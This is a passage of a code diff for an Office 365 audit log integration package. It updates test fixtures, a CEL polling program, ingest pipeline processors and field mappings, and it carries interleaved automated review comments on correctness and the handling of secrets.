- "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -7798,7 +7798,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7897,15 +7897,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7928,7 +7928,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8027,15 +8027,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8058,7 +8058,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8157,15 +8157,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8188,7 +8188,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8287,15 +8287,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8318,7 +8318,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -8417,15 +8417,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8448,7 +8448,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8547,15 +8547,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8578,7 +8578,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8677,15 +8677,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8708,7 +8708,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8807,15 +8807,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8838,7 +8838,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json index 29668206886..e1a4d335b6d 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json @@ -39,11 +39,11 @@ "Actor": [ { "ID": "21119711-1517-43d4-8138-b537dafad016", - "Type": 0 + "Type": "0" }, { "ID": "root@testsiem4.onmicrosoft.com", - "Type": 5 + "Type": "5" } ], "ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", @@ -64,7 +64,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json new file mode 100644 index 00000000000..6eefdf8cdf1 --- /dev/null +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json 
@@ -0,0 +1,34 @@ +{ + "events": [ + { + "event": { + "original": "{\"Activity\":\"CreateArtifact\",\"WorkspaceName\":\"obszar_robaczy\",\"OrganizationId\":\"53d83e1d-xxx-xxx-84e9-01ec5045dd81\",\"Operation\":\"CreateArtifact\",\"Id\":\"a4420e70-b7a1-xxx-xxx-11e3364acd22\",\"CreationTime\":\"2024-01-30T14:23:40\",\"Timestamp\":\"2024-01-30T14:22:50\",\"UserId\":\"username@domain.pl\",\"ClientIP\":\"81.2.69.144\",\"RecordType\":20,\"ResultStatus\":\"InProgress\",\"ObjectDisplayName\":\"test_lakehouse\",\"OperationId\":\"a84f7f73-xxxx-xxxx-8cf3-094f69c23756\",\"Experience\":\"Lakehouse\",\"WorkspaceId\":\"91dad513-xxxx-xxxx-94bb-f5cbf305691c\",\"ObjectId\":\"0e00d1cf-825a-4d78-98ff-8a8199357669\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\",\"Workload\":\"PowerBI\",\"RequestId\":\"fcbbe282-xxx-xxxx-xxxx-dc1e6d9b090b\",\"OperationProperties\":\"[{\\\"Name\\\":\\\"SystemArtifactType\\\",\\\"Value\\\":\\\"None\\\"}]\",\"ObjectType\":\"Lakehouse\",\"UserType\":0,\"UserKey\":\"xxxxxxxx\"}" + }, + "o365audit": { + "Activity": "CreateArtifact", + "WorkspaceName": "obszar_robaczy", + "OrganizationId": "53d83e1d-xxx-xxx-84e9-01ec5045dd81", + "Operation": "CreateArtifact", + "Id": "a4420e70-b7a1-xxx-xxx-11e3364acd22", + "CreationTime": "2024-01-30T14:23:40", + "Timestamp": "2024-01-30T14:22:50", + "UserId": "username@domain.pl", + "ClientIP": "81.2.69.144", + "RecordType": 20, + "ResultStatus": "InProgress", + "ObjectDisplayName": "test_lakehouse", + "OperationId": "a84f7f73-xxxx-xxxx-8cf3-094f69c23756", + "Experience": "Lakehouse", + "WorkspaceId": "91dad513-xxxx-xxxx-94bb-f5cbf305691c", + "ObjectId": "0e00d1cf-825a-4d78-98ff-8a8199357669", + "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", + "Workload": "PowerBI", + "RequestId": "fcbbe282-xxx-xxxx-xxxx-dc1e6d9b090b", + "OperationProperties": 
"[{\"Name\":\"SystemArtifactType\",\"Value\":\"None\"}]", + "ObjectType": "Lakehouse", + "UserType": 0, + "UserKey": "xxxxxxxx" + } + } + ] +} \ No newline at end of file diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json-expected.json new file mode 100644 index 00000000000..d6893154166 --- /dev/null +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-stringly-json-events.json-expected.json 
@@ -0,0 +1,110 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-30T14:23:40.000Z", + "client": { + "address": "81.2.69.144", + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "CreateArtifact", + "category": [ + "web" + ], + "code": "PowerBIAudit", + "id": "a4420e70-b7a1-xxx-xxx-11e3364acd22", + "kind": "event", + "original": "{\"Activity\":\"CreateArtifact\",\"WorkspaceName\":\"obszar_robaczy\",\"OrganizationId\":\"53d83e1d-xxx-xxx-84e9-01ec5045dd81\",\"Operation\":\"CreateArtifact\",\"Id\":\"a4420e70-b7a1-xxx-xxx-11e3364acd22\",\"CreationTime\":\"2024-01-30T14:23:40\",\"Timestamp\":\"2024-01-30T14:22:50\",\"UserId\":\"username@domain.pl\",\"ClientIP\":\"81.2.69.144\",\"RecordType\":20,\"ResultStatus\":\"InProgress\",\"ObjectDisplayName\":\"test_lakehouse\",\"OperationId\":\"a84f7f73-xxxx-xxxx-8cf3-094f69c23756\",\"Experience\":\"Lakehouse\",\"WorkspaceId\":\"91dad513-xxxx-xxxx-94bb-f5cbf305691c\",\"ObjectId\":\"0e00d1cf-825a-4d78-98ff-8a8199357669\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\",\"Workload\":\"PowerBI\",\"RequestId\":\"fcbbe282-xxx-xxxx-xxxx-dc1e6d9b090b\",\"OperationProperties\":\"[{\\\"Name\\\":\\\"SystemArtifactType\\\",\\\"Value\\\":\\\"None\\\"}]\",\"ObjectType\":\"Lakehouse\",\"UserType\":0,\"UserKey\":\"xxxxxxxx\"}", + "outcome": "success", + "provider": "PowerBI", + "type": [ + "info" + ] + }, + "host": { + "id": "53d83e1d-xxx-xxx-84e9-01ec5045dd81", + "name": "domain.pl" + }, + "network": { + "type": "ipv4" + }, + "o365": { + "audit": { + "Activity": "CreateArtifact", + "CreationTime": "2024-01-30T14:23:40", + "Experience": "Lakehouse", + "ObjectDisplayName": "test_lakehouse", + "ObjectId": "0e00d1cf-825a-4d78-98ff-8a8199357669", + "ObjectType": "Lakehouse", + "OperationId": "a84f7f73-xxxx-xxxx-8cf3-094f69c23756", + "OperationProperties": [ + { + "Name": "SystemArtifactType", + "Value": "None" + } + ], + 
"RecordType": "20", + "RequestId": "fcbbe282-xxx-xxxx-xxxx-dc1e6d9b090b", + "ResultStatus": "InProgress", + "Timestamp": "2024-01-30T14:22:50", + "UserId": "username@domain.pl", + "UserKey": "xxxxxxxx", + "UserType": "0", + "WorkspaceId": "91dad513-xxxx-xxxx-94bb-f5cbf305691c", + "WorkspaceName": "obszar_robaczy" + } + }, + "organization": { + "id": "53d83e1d-xxx-xxx-84e9-01ec5045dd81" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "username" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "domain.pl", + "email": "username@domain.pl", + "id": "username@domain.pl", + "name": "username" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", + "os": { + "full": "Windows 10", + "name": "Windows", + "version": "10" + }, + "version": "120.0.0.0" + } + } + ] +} \ No newline at end of file diff --git a/packages/o365/data_stream/audit/_dev/test/system/test-cel-config.yml b/packages/o365/data_stream/audit/_dev/test/system/test-cel-config.yml index bf63d73d6f8..e518190073f 100644 --- a/packages/o365/data_stream/audit/_dev/test/system/test-cel-config.yml +++ b/packages/o365/data_stream/audit/_dev/test/system/test-cel-config.yml @@ -12,5 +12,6 @@ data_stream: azure_tenant_id: test-cel-tenant-id content_types: "Audit.SharePoint, Audit.General" initial_interval: 12h + enable_request_tracer: true assert: - hit_count: 6 + hit_count: 8 
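Review bot: The `hit_count` assertion moves from 6 to 8 with nothing in this file saying where the two extra documents come from, so the next person who sees the count drift has no baseline to reason from. A short comment on the assert, e.g. `hit_count: 8  # <why the expected count changed from 6>`, would pin that down. `enable_request_tracer: true` also makes the input write the full HTTP exchange to the tracer file; a comment that this is intended only for this (presumably mock-backed) system test would keep the setting from being copied into a policy template.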
diff --git a/packages/o365/data_stream/audit/_dev/test/system/test-o365audit-config.yml b/packages/o365/data_stream/audit/_dev/test/system/test-o365audit-config.yml deleted file mode 100644 index dff36f749e2..00000000000 --- a/packages/o365/data_stream/audit/_dev/test/system/test-o365audit-config.yml +++ /dev/null @@ -1,18 +0,0 @@ -input: o365audit -service: o365 -vars: ~ -policy_template: o365 -data_stream: - vars: - preserve_original_event: true - application_id: test-app-id - client_secret: test-secret - tenants: - - tenant-id - tenant_names: - - "tenant-id: domain-name" - api: | - authentication_endpoint: http://{{Hostname}}:{{Port}}/ - resource: http://{{Hostname}}:{{Port}} -assert: - hit_count: 27 diff --git a/packages/o365/data_stream/audit/agent/stream/cel.yml.hbs b/packages/o365/data_stream/audit/agent/stream/cel.yml.hbs index bb9bd7bf305..1c9e47a9dbe 100644 --- a/packages/o365/data_stream/audit/agent/stream/cel.yml.hbs +++ b/packages/o365/data_stream/audit/agent/stream/cel.yml.hbs @@ -60,20 +60,20 @@ resource.tracer.maxsize: 5 state: want_more: false base: - list_contents_url: "{{url}}/api/v1.0/{{azure_tenant_id}}/activity/feed/subscriptions/content?contentType=" + tenant_id: "{{azure_tenant_id}}" list_contents_start_time: "{{initial_interval}}" redact: - fields: ~ + fields: + - base.tenant_id program: | - now().as(now, // Prevent now time skew. Remove this and the closing parenthesis when kibana.version is 8.10.1 or higher. "{{content_types}}".split(",").map(content_type_raw, content_type_raw.trim_space() ).map(content_type, request( "POST", - "{{url}}/api/v1.0/{{azure_tenant_id}}/activity/feed/subscriptions/start?contentType=" + content_type + "&PublisherIdentifier={{azure_tenant_id}}" + "{{url}}/api/v1.0/" + state.base.tenant_id + "/activity/feed/subscriptions/start?contentType=" + content_type + "&PublisherIdentifier=" + state.base.tenant_id ).do_request().as(start_subs_resp, bytes(start_subs_resp.Body).decode_json().as(start_subs_resp_body, ( 
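Review bot: Dropping the `now().as(now,` wrapper (its closing parenthesis goes in the `@@ -196` hunk further down) is only safe once the package's kibana.version constraint is at least 8.10.1, which is what the removed comment required; that manifest change is not in this chunk, so please confirm it is part of the same commit. Moving the tenant id into `state.base.tenant_id` and listing it under `redact.fields` keeps it out of state dumps, but the same value is still concatenated into every request URL (`"{{url}}/api/v1.0/" + state.base.tenant_id + ...`), which, as far as I can tell, the state redaction does not cover when the request tracer is enabled; if the id is considered sensitive, a comment next to the redact entry stating that limitation would help. The `program:` block continues past the end of this hunk.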
@@ -104,7 +104,9 @@ program: | : state_created_at ).as(state_created_at_calc, - state.base.list_contents_url + content_type + "&PublisherIdentifier={{azure_tenant_id}}" + "{{url}}/api/v1.0/" + state.base.tenant_id + + "/activity/feed/subscriptions/content?contentType=" + content_type + + "&PublisherIdentifier=" + state.base.tenant_id + "&startTime=" + string(state_created_at_calc + duration("1s")) + "&endTime=" + string((state_created_at_calc + batch_interval).as(calc_end_time, calc_end_time <= now ? calc_end_time : now)) ) @@ -112,7 +114,9 @@ program: | ) : // initial run when no cursor state exists i.e., polling from initial_interval - state.base.list_contents_url + content_type + "&PublisherIdentifier={{azure_tenant_id}}" + "{{url}}/api/v1.0/" + state.base.tenant_id + + "/activity/feed/subscriptions/content?contentType=" + content_type + + "&PublisherIdentifier=" + state.base.tenant_id + "&startTime=" + string(now - duration(state.base.list_contents_start_time)) + "&endTime=" + string((now - duration(state.base.list_contents_start_time) + batch_interval).as(calc_end_time, calc_end_time <= now ? calc_end_time : now)) ) 
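Review bot: The content-list URL prefix `"{{url}}/api/v1.0/" + state.base.tenant_id + "/activity/feed/subscriptions/content?contentType="` is now spelled out here and again in the `@@ -112` hunk below, replacing the single `state.base.list_contents_url` the old code had; two copies of the same literal are easy to let drift. Binding it once near the top of the program, e.g. `("{{url}}/api/v1.0/" + state.base.tenant_id + "/activity/feed/subscriptions/content?contentType=").as(list_contents_url, ...)`, keeps the redaction benefit (the bound value never enters state) while restoring a single definition. The `program:` block starts and ends outside these hunks.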
@@ -123,42 +127,79 @@ program: | has(list_contents_resp_body[0].contentUri) && list_contents_resp_body[0].contentUri != "" && has(list_contents_resp_body[0].contentCreated) && list_contents_resp_body[0].contentCreated != "" ) ? - // contents exist to consume - list_contents_resp_body.map(l1, - request("GET", l1.contentUri).do_request().as(content_resp, - bytes(content_resp.Body).decode_json() - ).map(content_resp_body, - content_resp_body.with({"copy": {"o365audit": content_resp_body}}) - ).map(content_resp_body_with_copy, - content_resp_body_with_copy.copy) - ).flatten().drop_empty().as(contents, { - "events_per_content_type": contents, - "content_type": content_type, - "content_created_at": {"temp": list_contents_resp_body}.collate("temp.contentCreated").max(), - "next_page": ( - (has(list_contents_resp.Header) && has(list_contents_resp.Header.NextPageUri) ) ? - list_contents_resp.Header.NextPageUri[0] - : (has(list_contents_resp.Header) && has(list_contents_resp.Header.Nextpageuri)) ? - list_contents_resp.Header.Nextpageuri[0] - : - "" - ), - // keep fetching more if (nextpageuri exists) or (max time returned date != today's date) - "want_more_content": ( - ( - has(list_contents_resp.Header) && ( - (has(list_contents_resp.Header.NextPageUri) && (list_contents_resp.Header.NextPageUri.size() > 0)) || - (has(list_contents_resp.Header.Nextpageuri) && (list_contents_resp.Header.Nextpageuri.size() > 0)) - ) - ) || - ( - {"temp": list_contents_resp_body}.collate("temp.contentCreated").max().split('T')[0] != now.format("2006-01-02") - ) - ) - }) + // contents exist to consume + list_contents_resp_body.map(l1, + (has(l1.contentExpiration) && (l1.contentExpiration.parse_time(time_layout.RFC3339) >= now)) ? + ( + request("GET", l1.contentUri).do_request().as(content_resp, + (has(content_resp.StatusCode) && content_resp.StatusCode == 200) ? 
+ ( + bytes(content_resp.Body).decode_json() + .map(content_resp_body, + content_resp_body.with({"copy": {"o365audit": content_resp_body}})) + .map(content_resp_body_with_copy, + content_resp_body_with_copy.copy) + .flatten().drop_empty().as(contents, { + "events_per_content_type": contents, + "content_type": content_type, + // if 'contentCreated' is older than 167h55m, change it to 167h55m. + "content_created_at": {"temp": list_contents_resp_body}.collate("temp.contentCreated").max().as(temp_max, temp_max.parse_time(time_layout.RFC3339) > (now - duration("167h55m")) ? temp_max : (now - duration("167h55m")).format(time_layout.RFC3339)), + "next_page": ( + (has(list_contents_resp.Header) && has(list_contents_resp.Header.NextPageUri) ) ? + list_contents_resp.Header.NextPageUri[0] + : (has(list_contents_resp.Header) && has(list_contents_resp.Header.Nextpageuri)) ? + list_contents_resp.Header.Nextpageuri[0] + : + "" + ), + // keep fetching more if (nextpageuri exists) or (max time returned date != today's date) + "want_more_content": ( + ( + has(list_contents_resp.Header) && ( + (has(list_contents_resp.Header.NextPageUri) && (list_contents_resp.Header.NextPageUri.size() > 0)) || + (has(list_contents_resp.Header.Nextpageuri) && (list_contents_resp.Header.Nextpageuri.size() > 0)) + ) + ) || + ( + {"temp": list_contents_resp_body}.collate("temp.contentCreated").max().split('T')[0] != now.format("2006-01-02") + ) + ) + }) + ) + : + { + "events_per_content_type": [], + "content_type": content_type, + "content_created_at": {"temp": list_contents_resp_body}.collate("temp.contentCreated").max().as(temp_max, temp_max.parse_time(time_layout.RFC3339) > (now - duration("167h55m")) ? temp_max : (now - duration("167h55m")).format(time_layout.RFC3339)), + "next_page": ( + (has(list_contents_resp.Header) && has(list_contents_resp.Header.NextPageUri) ) ? + list_contents_resp.Header.NextPageUri[0] + : (has(list_contents_resp.Header) && has(list_contents_resp.Header.Nextpageuri)) ? 
+ list_contents_resp.Header.Nextpageuri[0] + : + "" + ) + } + ) + ) + : + { + "events_per_content_type": [], + "content_type": content_type, + "content_created_at": {"temp": list_contents_resp_body}.collate("temp.contentCreated").max().as(temp_max, temp_max.parse_time(time_layout.RFC3339) > (now - duration("167h55m")) ? temp_max : (now - duration("167h55m")).format(time_layout.RFC3339)), + "next_page": ( + (has(list_contents_resp.Header) && has(list_contents_resp.Header.NextPageUri) ) ? + list_contents_resp.Header.NextPageUri[0] + : (has(list_contents_resp.Header) && has(list_contents_resp.Header.Nextpageuri)) ? + list_contents_resp.Header.Nextpageuri[0] + : + "" + ) + } + ) : // contents does not exist, or is empty array - list_contents_resp.Request.URL.parse_url().RawQuery.parse_query().as(reqQuery, { + list_contents_resp.Request.URL.parse_url().RawQuery.parse_query().as(reqQuery, [{ "events_per_content_type": size(list_contents_resp_body) == 0 ? [] : [list_contents_resp_body], "content_type": content_type, "content_created_at": ( @@ -180,12 +221,12 @@ program: | has(list_contents_resp.StatusCode) && list_contents_resp.StatusCode == 200 && (reqQuery.endTime[0].split('T')[0] != now.format("2006-01-02")) ) - }) + }]) ) ) : // When start-subscription API produces error, such as Authentication error. - { + [{ "events_per_content_type": [], "content_type": content_type, "content_created_at": 
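Review bot: In the two new fallback branches (blob expired, or `content_resp.StatusCode != 200`) the blob is skipped silently while `content_created_at` is still advanced to the page maximum, so a transient non-200 on a single content GET moves the cursor past that blob and it is never fetched again; for an audit feed that is a silent gap, so the skip should at least be surfaced (an error object in the returned events, or a logged reason) rather than a bare `[]`. Those branches also omit `want_more_content` although they compute `next_page`; if every blob on a page lands in them, `events_list.collate("want_more_content")` presumably yields nothing true and paging stops short of the listed next page. The `content_created_at` clamp and the `next_page` block are now copied three times; binding each once with `.as()` before the branch would shrink this hunk considerably, and the clamp's `167h55m` deserves a why comment, e.g. `// presumably the API's seven-day content retention, with a small margin`. The enclosing `program:` block starts and ends outside this hunk.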
@@ -196,21 +237,17 @@ program: | , "next_page": "", "want_more_content": false - } + }] ) ) ).flatten().drop_empty().as(events_list, { - "base": { - "list_contents_url": "{{url}}/api/v1.0/{{azure_tenant_id}}/activity/feed/subscriptions/content?contentType=", - "list_contents_start_time": "{{initial_interval}}" - }, + "base": state.base, "events": events_list.collate("events_per_content_type"), "want_more": events_list.collate("want_more_content").filter(e, e == true).size() > 0, "cursor": { "content_types_state_as_list": events_list.drop(["events_per_content_type"]), } }) - ) // Remove when kibana.version is 8.10.1+. {{#if tags}} tags: diff --git a/packages/o365/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/o365/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 6e05dc63d5f..a1dce5a270b 100644 --- a/packages/o365/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/o365/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -80,6 +80,16 @@ processors: field: o365audit.OrganizationId target_field: organization.id ignore_missing: true + - json: + tag: json-extract-stringly-OperationProperties + field: o365audit.OperationProperties + if: ctx.o365audit?.OperationProperties instanceof String + on_failure: + - remove: + field: o365audit.OperationProperties + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: o365audit.UserAgent target_field: user_agent.original 
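Review bot: `"base": state.base` now carries the `list_contents_url` and `list_contents_start_time` values that this hunk removes from the program, so the program is only correct if the input's initial `state` seeds `base` with both keys; that block lies outside this hunk and is not visible in the diff, so please confirm it was updated in the same change. A short comment above the line would help the next reader, e.g. `// base (list_contents_url, list_contents_start_time) is seeded by the initial state and carried forward unchanged.` The enclosing CEL expression starts well before this hunk.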
@@ -1093,6 +1103,24 @@ processors:
field: o365audit.UserType
type: string
ignore_missing: true
+ - foreach:
+ field: o365audit.Actor
+ if: ctx.o365audit?.Actor instanceof List
+ processor:
+ convert:
+ field: _ingest._value.Type
+ tag: convert_actor_type_to_string
+ type: string
+ ignore_missing: true
+ - foreach:
+ field: o365audit.Target
+ if: ctx.o365audit?.Target instanceof List
+ processor:
+ convert:
+ field: _ingest._value.Type
+ tag: convert_target_type_to_string
+ type: string
+ ignore_missing: true
- convert:
field: o365audit.Version
type: string
diff --git a/packages/o365/data_stream/audit/fields/fields.yml b/packages/o365/data_stream/audit/fields/fields.yml
index 445cb4b7464..25d5994e599 100644
--- a/packages/o365/data_stream/audit/fields/fields.yml
+++ b/packages/o365/data_stream/audit/fields/fields.yml
@@ -1,6 +1,8 @@
- name: o365.audit
type: group
fields:
+ - name: Activity
+ type: keyword
- name: Actor
type: group
fields:
@@ -205,6 +207,8 @@
# not expressible here; object_type_mapping_type cannot be 'boolean'.
object_type: keyword
object_type_mapping_type: '*'
+ - name: Experience
+ type: keyword
- name: ExtendedProperties.*
type: object
object_type: keyword
@@ -269,10 +273,20 @@
type: keyword
- name: NewValue
type: keyword
+ - name: ObjectDisplayName
+ type: keyword
- name: ObjectId
type: keyword
+ - name: ObjectType
+ type: keyword
- name: Operation
type: keyword
+ - name: OperationId
+ type: keyword
+ - name: OperationProperties
+ type: object
+ object_type: keyword
+ object_type_mapping_type: '*'
- name: OrganizationId
type: keyword
- name: OrganizationName
@@ -293,6 +307,8 @@
type: keyword
- name: ResultStatus
type: keyword
+ - name: RequestId
+ type: keyword
- name: SensitiveInfoDetectionIsIncluded
type: boolean
- name: SharePointMetaData.*
@@ -337,6 +353,8 @@
type: keyword
- name: TeamGuid
type: keyword
+ - name: Timestamp
+ type: keyword
- name: UniqueSharingId
type: keyword
- name: UserAgent
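Review bot: `o365.audit.Timestamp` in the `@@ -337` hunk is mapped as `keyword`, which rules out range queries and sorting on it if the upstream value is an ISO-8601 timestamp; `type: date` would fit better, with a `date` processor in the pipeline if the format needs normalising. If the value is known not to be uniformly parseable, keyword is the safe choice, but a comment saying so next to the mapping, e.g. `# kept as keyword: upstream Timestamp format is not guaranteed to be ISO-8601`, would stop a later "fix" from breaking ingestion.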
@@ -353,5 +371,9 @@
type: keyword
- name: Workload
type: keyword
+ - name: WorkspaceId
+ type: keyword
+ - name: WorkspaceName
+ type: keyword
- name: YammerNetworkId
type: keyword
diff --git a/packages/o365/data_stream/audit/manifest.yml b/packages/o365/data_stream/audit/manifest.yml
index 69d40cd3376..d2cb9e2795a 100644
--- a/packages/o365/data_stream/audit/manifest.yml
+++ b/packages/o365/data_stream/audit/manifest.yml
@@ -39,6 +39,7 @@ streams:
description: Client secret used for Oauth2 authentication
show_user: true
required: true
+ secret: true
- name: token_url
type: text
title: Oauth2 Token URL
@@ -46,6 +47,7 @@ streams:
show_user: true
required: false
default: https://login.microsoftonline.com
+ secret: false
- name: token_scopes
type: text
title: Token Scopes
@@ -55,6 +57,7 @@ streams:
description: Scopes for OAuth2 token.
required: true
show_user: false
+ secret: false
- name: content_types
type: text
title: Content Type
@@ -207,6 +210,7 @@ streams:
multi: false
required: false
show_user: true
+ secret: true
- name: certificate
type: text
title: Path to certificate file
@@ -220,11 +224,12 @@ streams:
required: false
show_user: true
- name: key_passphrase
- type: text
+ type: password
title: Private key passphrase
multi: false
required: false
show_user: true
+ secret: true
- name: tenants
type: text
multi: true
diff --git a/packages/o365/data_stream/audit/sample_event.json b/packages/o365/data_stream/audit/sample_event.json
index 642d024498b..7df99553dc5 100644
--- a/packages/o365/data_stream/audit/sample_event.json
+++ b/packages/o365/data_stream/audit/sample_event.json
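Review bot: The `@@ -220` hunk pairs `secret: true` with `type: password` for `key_passphrase`, but the `@@ -39` hunk (the client secret, per its description) and the `@@ -207` hunk add `secret: true` while their `type:` lines sit outside the hunk, so I cannot see whether those variables are also `type: password`. As I understand the package spec, `secret: true` controls where Fleet stores the value and `type: password` controls whether the UI masks it, and a credential wants both. Please confirm both variables declare `type: password`, and if not, change them as this hunk did for `key_passphrase`.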
